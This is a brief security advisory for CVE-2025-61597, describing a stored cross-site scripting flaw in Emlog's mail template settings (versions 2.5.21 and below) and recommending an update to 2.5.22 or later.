CVE-2025-61597

Name of the Vulnerable Software and Affected Versions Emlog versions 2.5.21 and below

Description Emlog is a website building system. A flaw exists where a malicious payload can be saved through the mail template settings, leading to stored cross-site scripting (XSS). When an attacker saves malicious code, any subsequent visit to the settings page by an authenticated administrator will execute attacker-controlled JavaScript. This can result in session or token theft and complete admin account takeover.

Recommendations Update to version 2.5.22 or later.